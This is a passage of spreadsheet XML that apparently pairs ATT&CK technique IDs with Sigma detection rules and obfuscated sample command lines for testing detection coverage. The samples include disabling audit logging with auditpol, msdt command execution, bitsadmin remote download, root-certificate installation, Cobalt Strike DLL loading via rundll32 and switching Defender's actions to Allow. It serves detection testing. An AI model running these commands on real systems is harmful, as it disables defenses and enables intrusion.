          <t>proc_creation_win_auditpol_nt_resource_kit_usage</t>
        </is>
      </c>
      <c r="C3469" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol</t>
        </is>
      </c>
      <c r="D3469" s="44" t="inlineStr">
        <is>
          <t>c6c56ada-612b-42d1-9a29-adad3c5c2c1e</t>
        </is>
      </c>
      <c r="E3469" s="44" t="inlineStr">
        <is>
          <t>auditpol.exe "/logon":none</t>
        </is>
      </c>
      <c r="F3469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3469" s="44" t="n"/>
      <c r="J3469" s="44" t="n"/>
      <c r="K3469" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3470" ht="15.75" customHeight="1" s="42">
      <c r="A3470" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3470" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C3470" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D3470" s="44" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E3470" s="44" t="inlineStr">
        <is>
          <t>auditpol.exe /set /subcategory:"Logon" /success:dis"a"ble /failure:dis"a"ble</t>
        </is>
      </c>
      <c r="F3470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3470" s="44" t="n"/>
      <c r="J3470" s="44" t="n"/>
      <c r="K3470" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3471" ht="15.75" customHeight="1" s="42">
      <c r="A3471" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3471" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C3471" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D3471" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E3471" s="44" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F3471" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3471" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3471" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3471" s="44" t="n"/>
      <c r="J3471" s="44" t="n"/>
      <c r="K3471" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3472" ht="15.75" customHeight="1" s="42">
      <c r="A3472" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3472" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3472" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Using Msdt.EXE</t>
        </is>
      </c>
      <c r="D3472" s="44" t="inlineStr">
        <is>
          <t>258fc8ce-8352-443a-9120-8a11e4857fa5</t>
        </is>
      </c>
      <c r="E3472" s="44" t="inlineStr">
        <is>
          <t>msdt.exe /id PCWDiagnostic /skip true /param "IT_BrowseForFile =echo TEST-HOST"</t>
        </is>
      </c>
      <c r="F3472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3472" s="44" t="n"/>
      <c r="J3472" s="44" t="n"/>
      <c r="K3472" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3473" ht="15.75" customHeight="1" s="42">
      <c r="A3473" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3473" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_susp_cab_options</t>
        </is>
      </c>
      <c r="C3473" s="44" t="inlineStr">
        <is>
          <t>Suspicious Cabinet File Execution Via Msdt.EXE</t>
        </is>
      </c>
      <c r="D3473" s="44" t="inlineStr">
        <is>
          <t>dc4576d4-7467-424f-9eee-fd2b02855fe0</t>
        </is>
      </c>
      <c r="E3473" s="44" t="inlineStr">
        <is>
          <t>msdt.exe "-cab" C:\Temp\test.cab</t>
        </is>
      </c>
      <c r="F3473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3473" s="44" t="n"/>
      <c r="J3473" s="44" t="n"/>
      <c r="K3473" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3474" ht="15.75" customHeight="1" s="42">
      <c r="A3474" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3474" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_susp_cab_options</t>
        </is>
      </c>
      <c r="C3474" s="44" t="inlineStr">
        <is>
          <t>Suspicious Cabinet File Execution Via Msdt.EXE</t>
        </is>
      </c>
      <c r="D3474" s="44" t="inlineStr">
        <is>
          <t>dc4576d4-7467-424f-9eee-fd2b02855fe0</t>
        </is>
      </c>
      <c r="E3474" s="44" t="inlineStr">
        <is>
          <t>msdt.exe -cab:C:\Temp\test.cab</t>
        </is>
      </c>
      <c r="F3474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3474" s="44" t="n"/>
      <c r="J3474" s="44" t="n"/>
      <c r="K3474" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3475" ht="15.75" customHeight="1" s="42">
      <c r="A3475" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3475" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_susp_cab_options</t>
        </is>
      </c>
      <c r="C3475" s="44" t="inlineStr">
        <is>
          <t>Suspicious Cabinet File Execution Via Msdt.EXE</t>
        </is>
      </c>
      <c r="D3475" s="44" t="inlineStr">
        <is>
          <t>dc4576d4-7467-424f-9eee-fd2b02855fe0</t>
        </is>
      </c>
      <c r="E3475" s="44" t="inlineStr">
        <is>
          <t>msdt.exe	-cab	C:\Temp\test.cab</t>
        </is>
      </c>
      <c r="F3475" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3475" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3475" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3475" s="44" t="n"/>
      <c r="J3475" s="44" t="n"/>
      <c r="K3475" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3476" ht="15.75" customHeight="1" s="42">
      <c r="A3476" s="44" t="inlineStr">
        <is>
          <t>t1197</t>
        </is>
      </c>
      <c r="B3476" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_potential_persistence</t>
        </is>
      </c>
      <c r="C3476" s="44" t="inlineStr">
        <is>
          <t>Monitoring For Persistence Via BITS</t>
        </is>
      </c>
      <c r="D3476" s="44" t="inlineStr">
        <is>
          <t>b9cbbc17-d00d-4e3d-a827-b06d03d2380d</t>
        </is>
      </c>
      <c r="E3476" s="44" t="inlineStr">
        <is>
          <t>bitsadmin.exe -addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\thaim\AppData\Local\Temp\bitsadmin3_flag.ps1</t>
        </is>
      </c>
      <c r="F3476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3476" s="44" t="n"/>
      <c r="J3476" s="44" t="n"/>
      <c r="K3476" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3477" ht="15.75" customHeight="1" s="42">
      <c r="A3477" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3477" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_cert_susp_locations</t>
        </is>
      </c>
      <c r="C3477" s="44" t="inlineStr">
        <is>
          <t>Root Certificate Installed From Susp Locations</t>
        </is>
      </c>
      <c r="D3477" s="44" t="inlineStr">
        <is>
          <t>5f6a601c-2ecb-498b-9c33-660362323afa</t>
        </is>
      </c>
      <c r="E3477" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "Import-Certificate -FilePath 'C:\\Users\\Public\\certificate.cer' -CertStoreLocation 'Cert:\\LocalMachine\\Root'"</t>
        </is>
      </c>
      <c r="F3477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3477" s="44" t="n"/>
      <c r="J3477" s="44" t="n"/>
      <c r="K3477" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3478" ht="15.75" customHeight="1" s="42">
      <c r="A3478" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3478" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_cert_susp_locations</t>
        </is>
      </c>
      <c r="C3478" s="44" t="inlineStr">
        <is>
          <t>Root Certificate Installed From Susp Locations</t>
        </is>
      </c>
      <c r="D3478" s="44" t="inlineStr">
        <is>
          <t>5f6a601c-2ecb-498b-9c33-660362323afa</t>
        </is>
      </c>
      <c r="E3478" s="44" t="inlineStr">
        <is>
          <t>powershell Import-Certificate -CertStoreLocation 'Cert:\\LocalMachine\\Root' -FilePath 'C:\\Users\\Public\\certificate.cer'</t>
        </is>
      </c>
      <c r="F3478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3478" s="44" t="n"/>
      <c r="J3478" s="44" t="n"/>
      <c r="K3478" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3479" ht="15.75" customHeight="1" s="42">
      <c r="A3479" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3479" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_cert_susp_locations</t>
        </is>
      </c>
      <c r="C3479" s="44" t="inlineStr">
        <is>
          <t>Root Certificate Installed From Susp Locations</t>
        </is>
      </c>
      <c r="D3479" s="44" t="inlineStr">
        <is>
          <t>5f6a601c-2ecb-498b-9c33-660362323afa</t>
        </is>
      </c>
      <c r="E3479" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; {Import-Certificate -FilePath 'C:\\Users\\Public\\certificate.cer' -CertStoreLocation 'Cert:\\LocalMachine\\Root'}"</t>
        </is>
      </c>
      <c r="F3479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3479" s="44" t="n"/>
      <c r="J3479" s="44" t="n"/>
      <c r="K3479" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3480" ht="15.75" customHeight="1" s="42">
      <c r="A3480" s="44" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B3480" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_x509enrollment</t>
        </is>
      </c>
      <c r="C3480" s="44" t="inlineStr">
        <is>
          <t>Suspicious X509Enrollment - Process Creation</t>
        </is>
      </c>
      <c r="D3480" s="44" t="inlineStr">
        <is>
          <t>114de787-4eb2-48cc-abdb-c0b449f93ea4</t>
        </is>
      </c>
      <c r="E3480" s="44" t="inlineStr">
        <is>
          <t>cmd /c powershell -Command "[System.Security.Cryptography.X509Certificates.X509Enrollment]::Create('CBinaryConverter')"</t>
        </is>
      </c>
      <c r="F3480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3480" s="44" t="n"/>
      <c r="J3480" s="44" t="n"/>
      <c r="K3480" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3481" ht="15.75" customHeight="1" s="42">
      <c r="A3481" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3481" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C3481" s="44" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D3481" s="44" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E3481" s="44" t="inlineStr">
        <is>
          <t>chcp.com "936"</t>
        </is>
      </c>
      <c r="F3481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3481" s="44" t="n"/>
      <c r="J3481" s="44" t="n"/>
      <c r="K3481" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3482" ht="15.75" customHeight="1" s="42">
      <c r="A3482" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3482" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C3482" s="44" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D3482" s="44" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E3482" s="44" t="inlineStr">
        <is>
          <t>chcp.com 00936</t>
        </is>
      </c>
      <c r="F3482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3482" s="44" t="n"/>
      <c r="J3482" s="44" t="n"/>
      <c r="K3482" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3483" ht="15.75" customHeight="1" s="42">
      <c r="A3483" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3483" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lnk</t>
        </is>
      </c>
      <c r="C3483" s="44" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File</t>
        </is>
      </c>
      <c r="D3483" s="44" t="inlineStr">
        <is>
          <t>33339be3-148b-4e16-af56-ad16ec6c7e7b</t>
        </is>
      </c>
      <c r="E3483" s="44" t="inlineStr">
        <is>
          <t>findstr.exe TEST-HOST C:\Temp\test.lnk &amp; rem</t>
        </is>
      </c>
      <c r="F3483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3483" s="44" t="n"/>
      <c r="J3483" s="44" t="n"/>
      <c r="K3483" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3484" ht="15.75" customHeight="1" s="42">
      <c r="A3484" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3484" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_lnk</t>
        </is>
      </c>
      <c r="C3484" s="44" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File</t>
        </is>
      </c>
      <c r="D3484" s="44" t="inlineStr">
        <is>
          <t>33339be3-148b-4e16-af56-ad16ec6c7e7b</t>
        </is>
      </c>
      <c r="E3484" s="44" t="inlineStr">
        <is>
          <t>findstr.exe TEST-HOST C:\Temp\test.lnk -h</t>
        </is>
      </c>
      <c r="F3484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3484" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3484" s="44" t="n"/>
      <c r="J3484" s="44" t="n"/>
      <c r="K3484" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3485" ht="15.75" customHeight="1" s="42">
      <c r="A3485" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3485" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mode_codepage_russian</t>
        </is>
      </c>
      <c r="C3485" s="44" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language</t>
        </is>
      </c>
      <c r="D3485" s="44" t="inlineStr">
        <is>
          <t>12fbff88-16b5-4b42-9754-cd001a789fb3</t>
        </is>
      </c>
      <c r="E3485" s="44" t="inlineStr">
        <is>
          <t>mode.com con cp select=866 &amp; rem</t>
        </is>
      </c>
      <c r="F3485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3485" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3485" s="44" t="n"/>
      <c r="J3485" s="44" t="n"/>
      <c r="K3485" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3486" ht="15.75" customHeight="1" s="42">
      <c r="A3486" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3486" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mode_codepage_russian</t>
        </is>
      </c>
      <c r="C3486" s="44" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language</t>
        </is>
      </c>
      <c r="D3486" s="44" t="inlineStr">
        <is>
          <t>12fbff88-16b5-4b42-9754-cd001a789fb3</t>
        </is>
      </c>
      <c r="E3486" s="44" t="inlineStr">
        <is>
          <t>mode.com "con" "cp" "select=1251"</t>
        </is>
      </c>
      <c r="F3486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3486" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3486" s="44" t="n"/>
      <c r="J3486" s="44" t="n"/>
      <c r="K3486" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3487" ht="15.75" customHeight="1" s="42">
      <c r="A3487" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3487" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mode_codepage_russian</t>
        </is>
      </c>
      <c r="C3487" s="44" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language</t>
        </is>
      </c>
      <c r="D3487" s="44" t="inlineStr">
        <is>
          <t>12fbff88-16b5-4b42-9754-cd001a789fb3</t>
        </is>
      </c>
      <c r="E3487" s="44" t="inlineStr">
        <is>
          <t>mode.com con cp select=001251</t>
        </is>
      </c>
      <c r="F3487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3487" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3487" s="44" t="n"/>
      <c r="J3487" s="44" t="n"/>
      <c r="K3487" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3488" ht="15.75" customHeight="1" s="42">
      <c r="A3488" s="44" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B3488" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mode_codepage_russian</t>
        </is>
      </c>
      <c r="C3488" s="44" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language</t>
        </is>
      </c>
      <c r="D3488" s="44" t="inlineStr">
        <is>
          <t>12fbff88-16b5-4b42-9754-cd001a789fb3</t>
        </is>
      </c>
      <c r="E3488" s="44" t="inlineStr">
        <is>
          <t>mode.com con cp select=866 #</t>
        </is>
      </c>
      <c r="F3488" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3488" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3488" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3488" s="44" t="n"/>
      <c r="J3488" s="44" t="n"/>
      <c r="K3488" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3489" ht="15.75" customHeight="1" s="42">
      <c r="A3489" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3489" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_c3_rundll32_pattern</t>
        </is>
      </c>
      <c r="C3489" s="44" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32</t>
        </is>
      </c>
      <c r="D3489" s="44" t="inlineStr">
        <is>
          <t>b18c9d4c-fac9-4708-bd06-dd5bfacf200f</t>
        </is>
      </c>
      <c r="E3489" s="44" t="inlineStr">
        <is>
          <t>rundll32 .\payload.dll,StartNodeRelay</t>
        </is>
      </c>
      <c r="F3489" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3489" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3489" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3489" s="44" t="n"/>
      <c r="J3489" s="44" t="n"/>
      <c r="K3489" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3490" ht="15.75" customHeight="1" s="42">
      <c r="A3490" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3490" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_c3_rundll32_pattern</t>
        </is>
      </c>
      <c r="C3490" s="44" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32</t>
        </is>
      </c>
      <c r="D3490" s="44" t="inlineStr">
        <is>
          <t>b18c9d4c-fac9-4708-bd06-dd5bfacf200f</t>
        </is>
      </c>
      <c r="E3490" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\payload.dll,#1</t>
        </is>
      </c>
      <c r="F3490" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3490" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3490" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3490" s="44" t="n"/>
      <c r="J3490" s="44" t="n"/>
      <c r="K3490" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3491" ht="15.75" customHeight="1" s="42">
      <c r="A3491" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3491" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C3491" s="44" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D3491" s="44" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E3491" s="44" t="inlineStr">
        <is>
          <t>rundll32 2.dll, "StartW"</t>
        </is>
      </c>
      <c r="F3491" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3491" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3491" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3491" s="44" t="n"/>
      <c r="J3491" s="44" t="n"/>
      <c r="K3491" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3492" ht="15.75" customHeight="1" s="42">
      <c r="A3492" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3492" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C3492" s="44" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D3492" s="44" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E3492" s="44" t="inlineStr">
        <is>
          <t>rundll32 2.dll,#1</t>
        </is>
      </c>
      <c r="F3492" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3492" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3492" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3492" s="44" t="n"/>
      <c r="J3492" s="44" t="n"/>
      <c r="K3492" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3493" ht="15.75" customHeight="1" s="42">
      <c r="A3493" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3493" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C3493" s="44" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D3493" s="44" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E3493" s="44" t="inlineStr">
        <is>
          <t>rundll32 2.dll, StartW &amp; rem</t>
        </is>
      </c>
      <c r="F3493" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3493" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3493" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3493" s="44" t="n"/>
      <c r="J3493" s="44" t="n"/>
      <c r="K3493" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3494" ht="15.75" customHeight="1" s="42">
      <c r="A3494" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3494" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C3494" s="44" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D3494" s="44" t="inlineStr">
        <is>
          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E3494" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe desk.cpl,"Install"ScreenSaver not_an_scr.scr</t>
        </is>
      </c>
      <c r="F3494" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3494" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3494" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3494" s="44" t="n"/>
      <c r="J3494" s="44" t="n"/>
      <c r="K3494" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3495" ht="15.75" customHeight="1" s="42">
      <c r="A3495" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3495" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C3495" s="44" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D3495" s="44" t="inlineStr">
        <is>
          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E3495" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe desk.cpl,install_screensaver not_an_scr.scr</t>
        </is>
      </c>
      <c r="F3495" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3495" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3495" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3495" s="44" t="n"/>
      <c r="J3495" s="44" t="n"/>
      <c r="K3495" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3496" ht="15.75" customHeight="1" s="42">
      <c r="A3496" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3496" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_default_action_modified</t>
        </is>
      </c>
      <c r="C3496" s="44" t="inlineStr">
        <is>
          <t>PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction</t>
        </is>
      </c>
      <c r="D3496" s="44" t="inlineStr">
        <is>
          <t>1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e</t>
        </is>
      </c>
      <c r="E3496" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-MpPreference -LowThreatDefaultAction 'Al'""low'"</t>
        </is>
      </c>
      <c r="F3496" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3496" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3496" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3496" s="44" t="n"/>
      <c r="J3496" s="44" t="n"/>
      <c r="K3496" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3497" ht="15.75" customHeight="1" s="42">
      <c r="A3497" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3497" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_default_action_modified</t>
        </is>
      </c>
      <c r="C3497" s="44" t="inlineStr">
        <is>
          <t>PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction</t>
        </is>
      </c>
      <c r="D3497" s="44" t="inlineStr">
        <is>
          <t>1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e</t>
        </is>
      </c>
      <c r="E3497" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-MpPreference -LowThreatDefaultAction (3+3)"</t>
        </is>
